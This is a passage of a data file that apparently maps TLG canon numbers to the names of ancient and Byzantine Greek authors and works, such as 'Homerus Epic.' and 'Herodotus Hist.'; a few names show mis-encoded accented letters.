"0493": "Philostephanus Comic.",
"2162": "Aratus Hist.",
"0325": "Astydamas Trag.",
"0019": "Aristophanes Comic.",
"0266": "Tyrtaeus Eleg.",
"1949": "Potamon Hist.",
"2116": "Arcadius Gramm.",
"0690": "Erasistratus Med.",
"1326": "Dionysius Epic.",
"1698": "Telephus Gramm.",
"1507": "[Metopus] Phil.",
"0233": "Hipponax Iamb.",
"4170": "Vitae Pindari Et Varia De Pindaro",
"2027": "Valerius Apsines Rhet.",
"0603": "Silenus Trag.",
"5016": "Scholia In Callimachum",
"5028": "Scholia In Isocratem",
"0649": "Lesbonax Rhet.",
"1141": "Antimachus Epic.",
"1736": "Timonax Hist.",
"2770": "Callinicus Biogr.",
"0443": "Diocles Comic.",
"1386": "Historia Alexandri Magni",
"1771": "Montanus et Montanistae Theol.",
"4392": "Joannes Epiphaniensis Hist.",
"4000": "Aristaenetus Epist.",
"2194": "[Aristides] Hist.",
"3070": "Symeon Logothetes Hist.",
"3045": "Georgius Syncellus Chronogr.",
"2555": "Agesilaus Hist.",
"0083": "Dionysius Geogr.",
"0660": "Apollonius Med.",
"2455": "Aristocreon Hist.",
"1256": "Chares Gnom.",
"5021": "Scholia In Diophantum",
"1332": "[Diotogenes] Phil.",
"0275": "Peirazomene",
"1372": "Evangelium Evae",
"5003": "Erotica Adespota",
"1296": "Cypria",
"0703": "Numenius Poet. Didac.",
"1232": "[Butherus] Phil.",
"2007": "Martyrium Potamiaenae Et Basilidis",
"0604": "Ptolemaeus IV Philopator Trag.",
"3043": "Georgius Monachus Chronogr.",
"5008": "Scholia In Aelium Aristidem",
"4335": "Cleopatra Alchem.",
"2800": "Basilius Scr. Eccl.",
"2635": "Persinus Poeta",
"0478": "Nausicrates Comic.",
"1953": "Hieronymus Hist.",
"0326": "Sophocles Junior Trag.",
"2816": "Joannes Gramm. et Theol.",
"1691": "Sotades Iamb.",
"1569": "Pausanias Attic.",
"1343": "Eparchides Hist.",
"2153": "Bion Math. et Phil.",
"1490": "[Megillus] Phil.",
"0332": "Cleaenetus Trag.",
"1568": "Parthax Hist.",
"0429": "Cephisodorus Comic.",
"1729": "Thrasymachus Rhet. et Soph.",
"2396": "Hyperochus Hist.",
"1430": "Hieronymus Phil.",
"0336": "Crates Poet. Phil.",
"1096": "Euaretus Trag.",
"1216": "Barnabae Epistula",
"1757": "Julius Epic.",
"0312": "Philocles Trag.",
"1574": "Persaeus Phil.",
"9004": "Anonymi In Aristotelis Librum Alterum Analyticorum Posteriorum Commentarium",
"1969": "Philinus Hist.",
"2357": "Gorgon Hist.",
"1411": "Heracliti Ephesii Epistulae",
"1402": "Hephaestion Gramm.",
"2865": "Olympiodorus Diaconus Scr. Eccl.",
"2330": "Scamon Hist.",
"0421": "Aristophon Comic.",
"0515": "Timocles Comic.",
"1786": "Sogenes Comic.",
"4327": "Joannes Archiereus Alchem.",
"2239": "Pythagoristae (D-K) Phil.",
"1327": "Dionis Epistulae",
"4003": "Marcianus Geogr.",
"0205": "Philodamus Lyr.",
"2328": "Diogenes Hist.",
"2474": "Nicander Hist.",
"1371": "Evangelium Petri",
"1132": "Anonymus Alexandri Phil.",
"0044": "Antiochi Regis Epistulae",
"2647": "Zenothemis Geogr.",
"0307": "Neophron Trag.",
"0345": "Apollonides Trag.",
"2742": "Apophthegmata",
"2058": "Philostorgius Scr. Eccl.",
"0058": "Aeneas Tact.",
"2059": "Alexander Theol.",
"2475": "Menecrates Hist.",
"2346": "Andriscus Hist.",
"1270": "Clearchus Phil.",
"1486": "Matron Parodius",
"0749": "Antyllus Med.",
"0254": "Melanthius Eleg. et Trag.",
"1263": "Choerilus Epic.",
"2227": "Paron Phil.",
"0724": "Stephanus Med. et Phil.",
"0481": "Nicolaus Comic.",
"1544": "Nymphis Hist.",
"5022": "Scholia In Euclidem",
"0971": "Oeniades Lyr.",
"0038": "Arcesilai Epistula",
"0624": "Demetrius Hist. et Phil.",
"2611": "Butas Eleg.",
"1450": "Ister Hist.",
"2609": "Asopodorus Iamb.",
"4396": "Timagetus Hist.",
"0447": "Diphilus Comic.",
"0456": "Euangelus Comic.",
"0713": "Anaxagoras Phil.",
"4040": "Photius Lexicogr., Scr. Eccl. et Theol.",
"2270": "Callippus Hist.",
"2589": "Olympiodorus Alchem.",
"0648": "Onasander Tact.",
"0295": "Carmina Popularia (PMG)",
"2322": "Antenor Hist.",
"1224": "Bion Phil.",
"2383": "Diodorus Phil.",
"2387": "Athanis Hist.",
"2117": "Anonymus De Metrorum Ratione",
"2226": "Iccus Phil.",
"3047": "Michael Glycas Astrol. et Hist.",
"4019": "Olympiodorus Phil.",
"0090": "Agathemerus Geogr.",
"0605": "Polybius Rhet.",
"0733": "Cassius Iatrosophista Med.",
"0028": "Antiphon Orat.",
"0564": "Rufus Med.",
"0551": "Appianus Hist.",
"2605": "Agamestor Eleg.",
"0288": "Pisander Epic.",
"0315": "Sthenelus Trag.",
"1632": "Posidippus Epigr.",
"1845": "Callistratus Trag.",
"0752": "Eutecnius Soph.",
"2345": "Agl(a)osthenes Hist.",
"3075": "Pseudo-Mauricius Tact.",
"1713": "Themison Hist.",
"1374": "Evangelium Secundum Hebraeos",
"0538": "Hecataeus Hist.",
"2655": "[Damigeron Magus]",
"0045": "Artaxerxis Epistulae",
"2031": "Sopater Rhet.",
"0876": "Phrynichus II Trag.",
"0490": "Philippides Comic.",
"4037": "Anonymi Paradoxographi",
"0203": "Limenius Lyr.",
"4029": "Procopius Hist.",
"1728": "Theseus Hist.",
"0556": "Asclepiodotus Tact.",
"1679": "Socrates Hist.",
"3173": "Joannes Theol.",
"2230": "Boรฏdas Phil.",
"1483": "Martyrium Et Ascensio Isaiae",
"2118": "Gryllus",
"0088": "Aristoxenus Mus.",
"1269": "Cleanthes Phil.",
"0521": "Epicharmus Comic. et Pseudepicharmea",
"2971": "Georgius Peccator Poeta",
"1211": "Balagrus Hist.",
"0716": "Erotianus Gramm. et Med.",
"4139": "Severianus Scr. Eccl.",
"5017": "Scholia In Demosthenem",
"1498": "Menander Hist.",
"0054": "[Theano] Phil.",
"0364": "Danaรฏs vel Danaรฏdes",
"0544": "Sextus Empiricus Phil.",
"4147": "Florilegium Cyrillianum",
"0536": "Ephorus Hist.",
"0386": "Chilonis Epistula",
"0516": "Timostratus Comic.",
"0339": "Moschion Trag.",
"2617": "Demetrius Poeta",
"0067": "Agatharchides Geogr.",
"1754": "Xenophontis Epistulae",
"0457": "Eubulides Comic.",
"1148": "Antonius Diogenes Scr. Erot.",
"4397": "Myronianus Hist.",
"0282": "Anonymus De Viribus Herbarum",
"1541": "Nostoi",
"1094": "Theodorides Trag.",
"0592": "Hermogenes Rhet.",
"1475": "Maiistas Epic.",
"0602": "Comica Adespota (FCG)",
"1432": "[Hipparchus] Phil.",
"1305": "Democritus Hist.",
"0833": "Anaxion Trag.",
"0472": "Lysippus Comic.",
"2029": "Anonymi Geographia In Sphaera Intelligenda",
"0283": "Heraclides Ponticus Junior Gramm.",
"1625": "Polyclitus Phil.",
"4166": "Vitae Aeschinis",
"3023": "Constantinus VII Porphyrogenitus Imperator Hist.",
"1364": "Evangelium Aegyptium",
"0125": "Zenonis Epistula",
"4021": "David Phil.",
"1146": "Antipater Phil.",
"0466": "Heraclides Comic.",
"1360": "[Euryphamus] Phil.",
"1387": "(H)agias-Dercylus Hist.",
"1688": "Sostratus Gramm.",
"4094": "Choricius Rhet. et Soph.",
"1702": "Testamentum Jobi",
"0579": "Orphica",
"0001": "Apollonius Rhodius Epic.",
"0462": "Euthycles Comic.",
"0455": "Eriphus Comic.",
"1611": "Tyrannion Junior Gramm.",
"0572": "Gaius Scr. Eccl.",
"4096": "Dositheus Magister Gramm.",
"0496": "Phrynichus Comic.",
"0422": "Athenio Comic.",
"0261": "Simonides Lyr.",
"4300": "Lexicon Sabbaiticum",
"2679": "Testamentum Salomonis",
"1277": "[Clinias] Phil.",
"0666": "Adrianus Rhet. et Soph.",
"2583": "Manetho Astrol.",
"2641": "Priscus Epic.",
"0370": "Lamprocles Lyr.",
"1839": "Polyphrasmon Trag.",
"1124": "Andronicus Rhodius Phil.",
"2542": "Quintus Fabius Pictor Hist.",
"2680": "Scythinus Epigr.",
"0523": "Menecrates Comic.",
"4242": "Cyrus Rhet.",
"1431": "Hipparchus Astron. et Geogr.",
"0204": "Aristonous Lyr.",
"0720": "Harmodius Trag.",
"7051": "Doctrina Patrum",
"4082": "Musaeus Grammaticus Epic.",
"0056": "Thrasybuli Epistula",
"0746": "Theophilus Protospatharius et Stephanus Atheniensis Med.",
"1840": "Euripides II Trag.",
"2531": "Metrophanes Hist.",
"0541": "Menander Comic.",
"3145": "Joannes Anagnostes Hist. et Poeta",
"0449": "Ecphantides Comic.",
"1945": "Antigenes Hist.",
"3168": "Pseudo-Codinus Hist.",
"1358": "Eudoxus Astron.",
"1298": "Demetrii Phalerei Epistula",
"1180": "[Aristaeus] Phil.",
"1524": "Naumachius Epic.",
"4184": "Dionysius Soph.",
"0631": "Pittacus [Lyr.]",
"0273": "Scolia Alphabetica",
"0212": "Philetas Eleg. et Gramm.",
"5014": "Scholia In Aristophanem",
"0392": "Acusilaus Hist.",
"9012": "Ignatius Biogr. et Poeta",
"2217": "Nicias Hist.",
"0034": "Lycurgus Orat.",
"1488": "Maximus Theol.",
"1464": "Liber Jubilaeorum",
"1787": "[Menippus] Comic.",
"1735": "Timon Phil.",
"4394": "Joannes Antiochenus Hist.",
"0012": "Homerus Epic., Homer",
"0264": "Susarion Comic.",
"2598": "Procopius Rhet. et Scr. Eccl.",
"2274": "Hesychius Illustrius Hist.",
"0096": "Aesopus Scr. Fab. et Aesopica",
"1976": "Metrodorus Hist.",
"2291": "Cratylus Phil.",
"0394": "Apollonius Comic.",
"0341": "Lycophron Trag.",
"0718": "Aรซtius Med.",
"0691": "Harpocrationis Epistula",
"0688": "Agathocles Hist.",
"1286": "Corpus Hermeticum",
"1799": "Euclides Geom.",
"0416": "Archedicus Comic.",
"0290": "Encomium Ducis Thebaidos",
"2062": "Joannes Chrysostomus Scr. Eccl., John Chrysostom",
"2336": "Hereas Hist.",
"0239": "Antimachus Eleg. et Epic.",
"1811": "Metrodorus Major Phil.",
"0377": "Telestes Lyr.",
"4039": "Paulus Silentiarius Poeta",
"1676": "Simylus Iamb.",
"1981": "Theophanes Hist.",
"1485": "Martyrium Ptolemaei Et Lucii",
"0502": "Sophilus Comic.",
"1506": "Menodotus Hist.",
"0426": "Callias Comic.",
"3130": "Theophylactus Simocatta Epist. et Hist.",
"0734": "[Lucas Apostolus] Med.",
"0497": "Plato Comic.",
"0460": "Euphro Comic.",
"1664": "Seniores Alexandrini Scr. Eccl.",
"1583": "Phanodemus Hist.",
"4165": "Anonymi In Aristotelis Librum De Interpretatione Phil.",
"0499": "Polyzelus Comic.",
"2025": "Maximus Rhet.",
"2355": "Xeniades Soph.",
"0334": "Diogenes Phil. et Trag.",
"2205": "Autesion Hist.",
"4091": "Callistratus Soph.",
"0453": "Epilycus Comic.",
"0643": "Anonymus Londinensis Med.",
"3120": "Patria Constantinopoleos",
"0981": "Stesichorus II Lyr.",
"1549": "[Onatas] Phil.",
"0338": "Sosiphanes Trag.",
"2972": "Anonymi De Terrae Motibus",
"1302": "Demetrius Rhet.",
"0046": "Niciae Epistula",
"1328": "Dionysius Hist.",
"1365": "Melampus Scriptor De Divinatione",
"2218": "Calliphon et Democedes Med. et Phil.",
"4304": "Glossae In Herodotum",
"0360": "Armenidas Hist.",
"3002": "Prolegomena De Comoedia",
"2557": "[Aristobulus] Hist.",
"2030": "Geographica Adespota (GGM)",
"0744": "Alexander Med.",
"1750": "Vitae Prophetarum",
"0543": "Polybius Hist.",
"1607": "Phoronis",
"4072": "Eutocius Math.",
"1977": "Lucius Licinius Lucullus Hist.",
"1276": "Clidemus Hist.",
"1941": "Leo Hist.",
"4325": "[Hermes] Alchem.",
"2458": "Marcellus Hist.",
"2294": "Zeno Phil.",
"0653": "Aratus Astron. et Epic.",
"0482": "Nicomachus Comic.",
"4332": "Hierotheus Alchem. et Poeta",
"1414": "Heraclitus Phil.",
"0727": "Joannes Med.",
"0598": "Rhetorica Anonyma",
"1203": "Paeanes (CA)",
"1505": "Menesthenes Hist.",
"4028": "Stephanus Gramm.",
"2645": "Stratonicus Poeta",
"1665": "Seniores Apud Irenaeum Scr. Eccl.",
"0349": "Demonax [Trag.]",
"1670": "Serapion Scr. Eccl.",
"1398": "Hegesippus Scr. Eccl.",
"0412": "Apollodorus Carystius vel Apollodorus Gelous Comic.",
"2160": "Pyrrhus Hist.",
"9021": "Stephanus Alchem.",
"1530": "Nicanor Gramm.",
"0397": "Pronomus Lyr.",
"2181": "Moses Alchem.",
"2697": "Timolaus Rhet.",
"2560": "Pythocles Hist.",
"1083": "Isigonus Paradox.",
"1315": "Dinolochus Comic.",
"1389": "Harpocration Gramm.",
"2456": "Nessas Phil.",
"1515": "Moeris Attic.",
"2032": "Pappus Math.",
"0027": "Andocides Orat.",
"2937": "Lachares Soph.",
"0900": "Cleomenes Lyr.",
"0549": "Apollodorus Gramm.",
"2423": "Asclepiades Gramm. et Hist.",
"1732": "Timachidas Hist.",
"1734": "Timaeus Phil.",
"2539": "Diophantus Hist.",
"2192": "[Agatharchides] Hist.",
"5037": "Scholia In Sophoclem",
"2225": "Parm(en)iscus Phil.",
"0297": "Lyrica Adespota (PMG)",
"0646": "Pseudo-Justinus Martyr",
"4347": "Andron Hist.",
"1004": "Thessalus Astrol. et Med.",
"1310": "Dictys Hist.",
"1303": "Demochares Hist. et Orat.",
"0098": "Zenobius Sophista [Paroemiogr.]",
"0198": "Hedylus Epigr.",
"1821": "Iambica Adespota (ALG)",
"2568": "[Sosthenes] Hist.",
"0606": "Rufus Soph.",
"2714": "Theodorus Studites Scr. Eccl. et Theol.",
"1325": "Diogenis Sinopensis Epistulae",
"4105": "Julianus Scr. Eccl.",
"1349": "Epistula A Martyribus Lugdunensibus",
"1832": "Acesander Hist.",
"0498": "Poliochus Comic.",
"1476": "Mamercus Eleg.",
"2006": "Synesius Phil.",
"0249": "Echembrotus Eleg. et Lyr.",
"1637": "Protevangelium Jacobi",
"3169": "Joannes VI Cantacuzenus",
"2642": "[Astrampsychus Magus] Onir.",
"0340": "Sositheus Trag.",
"2048": "Salaminius Hermias Sozomenus Scr. Eccl.",
"1812": "Demaratus Hist.",
"2807": "Antonius Hagiographus Scr. Eccl.",
"1491": "Melanthius Hist.",
"0331": "[Polyidus] Trag.",
"2215": "Ar(i)aethus Hist.",
"4391": "Glaucus Hist.",
"1479": "Marci Aurelii Epistula",
"1427": "Herodorus Hist.",
"1508": "Metrodorus Phil.",
"3136": "Pseudo-Zonaras Lexicogr.",
"2169": "Herillus Phil.",
"2729": "Prorus Phil.",
"1281": "[Clitophon] Hist.",
"1289": "Crates Hist.",
"0041": "Chionis Epistulae",
"0418": "Aristagoras Comic.",
"2594": "Phillis Hist.",
"1451": "Josephus Et Aseneth",
"0237": "Anacreon Lyr.",
"1308": "Demosthenes Epic.",
"2636": "Pherenicus Epic.",
"0301": "Thespis Trag.",
"0082": "Apollonius Dyscolus Gramm.",
"0127": "Aulus Licinius Archias Epigr.",
"0260": "Semonides Eleg. et Iamb.",
"0484": "Nicostratus Comic.",
"0513": "Theopompus Comic.",
"1447": "Irenaeus Theol.",
"1247": "[Cebes] Phil.",
"0230": "Lyrica Adespota (CA)",
"0286": "Carmen Astrologicum",
"4089": "Theodoretus Scr. Eccl. et Theol.",
"1813": "Anonymus De Plantis Aegyptiis",
"0477": "Myrtilus Comic.",
"1794": "Philocles Comic.",
"3094": "Nicetas Choniates Hist., Scr. Eccl. et Rhet.",
"0581": "Paradoxographus Palatinus",
"2278": "Phanodicus Hist.",
"1239": "Domitius Callistratus Hist.",
"0053": "Phalaridis Epistulae",
"0272": "De Arboribus Avibusque Fabulae",
"0657": "Crateuas Med.",
"1775": "Pseudo-Agathon Epigr.",
"0371": "Diagoras Lyr.",
"2240": "Hicetas Phil.",
"1383": "Geminus Astron.",
"1165": "Apollodorus Mech.",
"1606": "Phoenix Iamb.",
"4005": "Anonymus Discipulus Isidori Milesii Mech.",
"2189": "Callinicus Soph.",
"2233": "Pseudo-Polemon",
"0655": "Parthenius Myth.",
"2625": "Herodicus Gramm.",
"1814": "Ptolemais Phil.",
"1133": "Anonymus Diodori Phil.",
"2133": "Achilles Tatius Astron.",
"1301": "Demetrius Poet. Phil.",
"0197": "Hedyle Epigr.",
"0071": "Periplus Maris Erythraei",
"0289": "Ammonius Epigr.",
"4150": "Anacreontea",
"1285": "Conon Hist.",
"3177": "Scriptor Incertus De Leone Armenio Hist.",
"1275": "Cleostratus Poet. Phil.",
"1297": "Damippus Phil.",
"2601": "Tiberius Rhet.",
"2241": "Xenophilus Mus. et Phil.",
"1685": "Sosibius Gramm.",
"0450": "Ephippus Comic.",
"5010": "Scholia In Aeschylum",
"2235": "Hippocrates Math.",
"1577": "Phaedimus Epigr.",
"1802": "Homerica",
"2367": "Theognis Hist.",
"1282": "Clytus Hist.",
"5032": "Scholia In Oppianum",
"0611": "Theodorus Trag.",
"1682": "Sopater Comic.",
"1788": "Phormis Comic.",
"1125": "Androtion Hist.",
"1649": "Pythaenetus Hist.",
"1662": "Sciras Comic.",
"2151": "Praxagoras Hist.",
"3015": "Joannes Cameniates Hist.",
"1675": "Simylus Eleg.",
"0441": "Demonicus Comic.",
"2255": "Gorgias Hist.",
"2246": "Lycon Phil.",
"1912": "Euphantus Phil.",
"2229": "Xuthus Phil.",
"4329": "Philosophus Anonymus Alchem.",
"4014": "Priscianus Phil.",
"0593": "Gorgias Rhet. et Soph.",
"2334": "Nausiphanes Phil.",
"1322": "Diogenianus Phil.",
"0294": "Corinna Lyr.",
"0008": "Athenaeus Soph.",
"0199": "Bacchylides Lyr.",
"0548": "Pseudo-Apollodorus Myth.",
"1687": "Sosicrates Hist.",
"2532": "[Hermesianax] Hist.",
"0049": "Pisistrati Epistula",
"0531": "Hermias Apol.",
"1727": "Theotimus Hist.",
"3146": "Ducas Hist.",
"2620": "Dionysius Iambus Gramm. et Poeta",
"5048": "Scholia In Clementem Alexandrinum",
"2967": "Theodorus Heracleensis vel Theodorus Mopsuestenus Scr. Eccl.",
"1710": "[Theages] Phil.",
"3079": "Michael Attaliates Hist.",
"2701": "Georgius Pisides Poeta",
"0619": "Apollonius Phil.",
"1816": "Epica Adespota (GDRK)",
"2556": "[Alexarchus] Hist.",
"1319": "Diogenes Phil.",
"1352": "Epistula Ecclesiarum Apud Lugdunum Et Viennam",
"1399": "Pamphilus Trag.",
"2196": "[Dercyllus] Hist.",
"0361": "Cleonides Mus.",
"2592": "Joannes Pediasimus Philol. et Rhet.",
"1382": "Fragmentum Teliambicum",
"1567": "Parrhasius Epigr.",
"1590": "Philippus Hist.",
"0618": "Antigoni Epistula",
"1667": "[Septem Sapientes] Phil.",
"1138": "Lycon Phil.",
"3128": "Theognostus Gramm.",
"0243": "Callinus Eleg.",
"1595": "Philodemus Phil.",
"1753": "Xenion Hist.",
"3147": "Michael Critobulus Hist.",
"1441": "Iamblichus Scr. Erot.",
"1143": "Antiochus Phil.",
"1556": "Pancrates Epigr.",
"2585": "Marcellinus Biogr.",
"0586": "Polemon Perieg.",
"2610": "Boiscus Iamb.",
"1318": "Diodorus Rhet.",
"1663": "Semus Gramm.",
"0211": "Simias Gramm.",
"0051": "[Melissa] Phil.",
"0430": "Chariclides Comic.",
"1911": "Diyllus Hist.",
"3155": "Joannes Protospatharius Gramm.",
"4333": "Nicephorus Blemmydes Alchem.",
"1500": "Menecrates Poet. Phil.",
"3157": "Theodorus Scutariota Hist.",
"1896": "[Dositheus] Hist.",
"1287": "Crantor Phil.",
"1800": "Euboeus Parodius",
"0723": "Leo Phil.",
"3178": "Anonymi Lexeis Rhetoricae",
"1323": "Aelius Dionysius Attic.",
"0578": "Nymphodorus Hist.",
"2074": "Apollinaris Theol.",
"1737": "Titanomachia",
"2623": "Euanthes Epic.",
"2036": "Dexippus Phil.",
"4345": "Menecrates Hist.",
"0717": "Hypsicles Astron. et Math.",
"1803": "Bruti Epistulae",
"2738": "Chronographiae Anonymae",
"4163": "Telegonia",
"2111": "Palladius Scr. Eccl.",
"0023": "Oppianus Epic.",
"2041": "Marcellus Theol.",
"2499": "Eustochius Soph.",
"0574": "Lysimachus Hist.",
"1638": "Proxenus Hist.",
"0089": "Praxiphanes Phil.",
"2614": "Cleomachus Poeta",
"0621": "[Ath]enodorus Trag.",
"1712": "Thebaรฏs",
"1493": "Melinno Lyr.",
"0372": "Praxilla Lyr.",
"1353": "Epitaphium Abercii",
"2626": "Hipparchus Parodius",
"1804": "Ninus",
"5024": "Anonymi In Hermogenem Rhet.",
"0740": "Jusjurandum Medicum",
"5000": "Concilia Oecumenica (ACO)",
"2349": "[Pyrander] Hist.",
"1512": "Minyas",
"0068": "Pseudo-Scymnus Geogr.",
"2630": "Lobo Poeta",
"1175": "Archestratus Parodius",
"2284": "Anaxandridas Hist.",
"0708": "[Ammonius] Gramm.",
"1230": "[Brotinus] Phil.",
"1608": "Phrynichus Attic.",
"1756": "Demetrius Gramm.",
"2506": "Capito Hist.",
"0617": "Anaximenes Phil.",
"0350": "[Dionysius Scymnaeus] Trag. vel Comic.",
"0504": "Sosipater Comic.",
"1972": "Eumachus Hist.",
"2034": "Porphyrius Phil.",
"1115": "Archestratus Trag.",
"0335": "Philiscus Trag.",
"1557": "Panyassis Epic.",
"1495": "Melito Apol.",
"4157": "Joannes Rhet.",
"1376": "Eudemus Rhet.",
"5027": "Scholia In Iamblichum Philosophum",
"5029": "Scholia In Lucianum",
"2607": "Alexinus Phil.",
"3176": "Pseudo-Sphrantzes Hist.",
"0439": "Demetrius Comic.",
"1690": "Sotadea",
"0061": "Pseudo-Lucianus Soph.",
"0235": "Iambica Adespota (IEG)",
"2691": "[Musaeus] Phil.",
"1428": "Hestiaeus Hist.",
"1954": "Heraclides Phil.",
"2243": "Apocalypsis Sedrach",
"1622": "Polycarpus Scr. Eccl.",
"2175": "[Autocharis] Hist.",
"2693": "Ptolemaeus III Euergetes I [Epigr.]",
"2651": "Artemidorus Eleg.",
"0748": "Severus Iatrosophista Med.",
"2033": "Theon Math.",
"0206": "Theocles Lyr.",
"2242": "Echecrates Phil.",
"4024": "Agathias Scholasticus Epigr. et Hist.",
"0583": "Philochorus Hist.",
"0219": "Rhianus Epic.",
"1482": "Cyranides",
"1334": "Dius Phil.",
"0628": "Gaius Musonius Rufus Phil.",
"1164": "Apollodorus Hist.",
"1254": "Charax Hist.",
"2461": "Uranius Hist.",
"1208": "Atticus Phil.",
"0530": "Pseudo-Galenus Med.",
"0277": "Monodia",
"9019": "Stephanus Phil.",
"4038": "Pamprepius Epic.",
"1293": "Crinis Phil.",
"0622": "Cleobuli Epistula",
"0013": "Hymni Homerici, Homeric Hymns",
"1791": "Menandri Et Philistionis Sententiae",
"2289": "Echephylidas Hist.",
"0656": "Dioscorides Pedanius Med.",
"4027": "Anonymi In Aristotelis Categorias Phil.",
"1278": "Clitarchus Gnom.",
"0236": "Alcibiades [Eleg.]",
"0207": "Hermocles Lyr.",
"4172": "Vitae Oppiani",
"0221": "Euphorion Epic.",
"0245": "Demodocus Eleg.",
"5012": "Scholia In Apollonium Rhodium",
"4282": "Anonymus Manichaeus Biogr.",
"0086": "Aristoteles Phil. et Corpus Aristotelicum, Aristotle",
"2386": "Timonides Hist.",
"1466": "Lollianus Scr. Erot.",
"2171": "Stesiclides Hist.",
"0065": "Scylax Perieg.",
"0650": "Herodas Mimogr.",
"1635": "Protagoras Soph.",
"3125": "Theodosius Diaconus Hist. et Poeta",
"2121": "Dioscorus Poeta",
"2340": "Diotimus Phil.",
"2871": "Joannes Malalas Chronogr.",
"1445": "Iliu Persis",
"2962": "Petrus Scr. Eccl. et Theol.",
"0200": "Mantissa Proverbiorum",
"1346": "Ephraem Scr. Eccl.",
"2045": "Nonnus Epic.",
"0030": "Hyperides Orat.",
"2591": "Orion Gramm.",
"2479": "Patrocles Hist.",
"0255": "Mimnermus Eleg.",
"1533": "Nicias Epigr.",
"2275": "Theagenes Phil.",
"0316": "Xenocles Trag.",
"1571": "[Pempelus] Phil.",
"2695": "Vitae Aristotelis",
"0510": "Teleclides Comic.",
"0087": "Aelius Herodianus et Pseudo-Herodianus Gramm. et Rhet.",
"0210": "Euphronius Lyr.",
"DOCCAN2": "TLG Canon, data base",
"2305": "Clidemus Phil.",
"0048": "Philippus II Rex Macedonum [Epist.]",
"1609": "Phylarchus Hist.",
"1494": "Melissus Phil.",
"0085": "Aeschylus Trag.",
"1181": "Aristarchus Astron.",
"0532": "Achilles Tatius Scr. Erot.",
"0528": "Aรซtius Doxogr.",
"2616": "Demareta Poeta",
"4026": "Anonymi In Aristotelis Artem Rhetoricam Rhet.",
"1459": "Lepidus Hist.",
"0384": "Acta Justini Et Septem Sodalium",
"0213": "Hermesianax Eleg.",
"4161": "Vitae Arati Et Varia De Arato",
"1168": "Apollonius Soph.",
"0405": "Anaxandrides Comic.",
"0378": "Ariphron Lyr.",
"0300": "Acta Alexandrinorum",
"4098": "Etymologicum Gudianum",
"0016": "Herodotus Hist.",
"1192": "Ariston Phil.",
"0352": "Isidorus Trag.",
"0471": "Lynceus Comic.",
"2213": "[Timotheus] Hist.",
"1503": "Menecrates Hist.",
"0609": "Tryphon I Gramm.",
"1162": "Apollas Hist.",
"0063": "Dionysius Thrax Gramm.",
"0299": "Terpander Lyr.",
"0246": "Dionysius Chalcus Eleg.",
"2008": "Martyrium Cononis",
"1408": "Heraclides Gramm.",
"1535": "Nicocrates Hist.",
"0736": "Stephanus Med.",
"1899": "Aristonicus Hist.",
"0036": "Bion Bucol.",
"2178": "Cassius Longinus Phil. et Rhet.",
"1700": "Testamenta XII Patriarcharum",
"1340": "[Eccelus] Phil.",
"0640": "Alciphron Rhet. et Soph.",
"2960": "Oracula Tiburtina",
"0093": "Theophrastus Phil.",
"2057": "Socrates Scholasticus Hist.",
"1161": "Apocryphon Ezechiel",
"0375": "Cinesias Lyr.",
"2702": "Michael Psellus Polyhist.",
"3170": "Ephraem Hist. et Poeta",
"3074": "Constantinus Manasses Hist. et Poeta",
"0614": "Valerius Babrius Scr. Fab.",
"1875": "Aristodemus Hist. et Myth.",
"0632": "[Pythagoras] Phil.",
"2604": "Ulpianus Gramm. et Rhet.",
"0918": "Lamynthius Lyr.",
"4110": "Evagrius Scr. Eccl.",
"4117": "Eustathius Scr. Eccl. et Theol.",
"1646": "Ptolemaeus Hist.",
"2543": "Lucius Cincius Alimentus Hist.",
"0706": "Philo Med.",
"0637": "Socraticorum Epistulae",
"0566": "Theopompus Hist.",
"2860": "Alexander Scr. Eccl.",
"0308": "Ion Phil. et Poeta",
"1764": "Vettius Valens Astrol.",
"2047": "Syriani, Sopatri Et Marcellini Scholia Ad Hermogenis Status",
"0424": "Axionicus Comic.",
"0613": "[Demetrius] Rhet.",
"0251": "Euenus Eleg.",
"0535": "Demades Orat. et Rhet.",
"0026": "Aeschines Orat.",
"2948": "Acta Philippi",
"0553": "Artemidorus Onir.",
"1435": "Hippias Hist.",
"1838": "Theon Gramm.",
"2628": "Idaeus Epic.",
"0248": "Diphilus Epic. et Iamb.",
"1438": "Hippys Hist.",
"0050": "Ptolemaei II Philadelphi Et Eleazari Epistulae",
"1763": "Tryphon II Gramm.",
"0387": "Sapphus vel Alcaei Fragmenta",
"0380": "Philoxenus Lyr.",
"4239": "Severus Soph.",
"3020": "Joannes Cinnamus Gramm. et Hist.",
"1196": "Aristophanes Hist.",
"1167": "Apollonius Biogr.",
"1967": "Leschides Epic.",
"0385": "Cassius Dio Hist., Dio Cassius",
"0700": "Apollodorus Trag.",
"1724": "Theon Phil.",
"2372": "Euagon Hist.",
"2545": "Gaius Acilius Hist. et Phil.",
"1704": "Teucer Hist.",
"2903": "Minucianus Junior Rhet.",
"4330": "Cosmas Hieromonachus Alchem.",
"1918": "Timagenes Hist.",
"1189": "Aristocrates Hist.",
"4090": "Cyrillus Theol.",
"1692": "Speusippus Phil.",
"1580": "Phaestus Epic.",
"1591": "Philistus Hist.",
"2559": "[Chrysippus] Hist.",
"0409": "Antidotus Comic.",
"0322": "Dicaeogenes Trag.",
"1373": "Evangelium Philippi",
"0503": "Sosicrates Comic.",
"2578": "Joannes Gramm. et Poeta",
"2718": "Manuel Philes Poeta et Scr. Rerum Nat.",
"2798": "Pseudo-Dionysius Areopagita Scr. Eccl. et Theol.",
"1182": "[Aristeas] Epic.",
"1201": "Assumptio Mosis",
"1715": "Theodoridas Epigr.",
"0679": "Aeschrion Lyr.",
"2633": "Niceratus Epic.",
"0321": "Aeschylus Trag.",
"1779": "Anonymus Epicureus Phil.",
"0402": "Alexis Comic.",
"2409": "Dioscurides Hist.",
"2613": "Callimachus Junior Epic.",
"0007": "Plutarchus Biogr. et Phil.",
"2303": "Archelaus Phil.",
"1273": "Cleon Eleg.",
"0311": "Iophon Trag.",
"2016": "Passio Perpetuae Et Felicitatis",
"0610": "Alcidamas Rhet.",
"0636": "Socratis Epistulae",
"1437": "Hippon Phil.",
"0594": "Alexander Rhet. et Soph.",
"4238": "Athanasius Soph.",
"0005": "Theocritus Bucol.",
"1153": "Apocalypsis Adam",
"0668": "Aegimius",
"0327": "Carcinus Junior Trag.",
"2577": "Anatolius Math. et Phil.",
"1213": "Julia Balbilla Lyr.",
"0410": "Antiphanes Comic.",
"1416": "(H)eren(n)ius Philo Gramm. et Hist.",
"1193": "Ariston Phil.",
"1709": "Theagenes Hist.",
"1337": "Dorotheus Astrol.",
"0351": "[Hippothoon] Trag.",
"0268": "Mesomedes Lyr.",
"0218": "Nicaenetus Epic.",
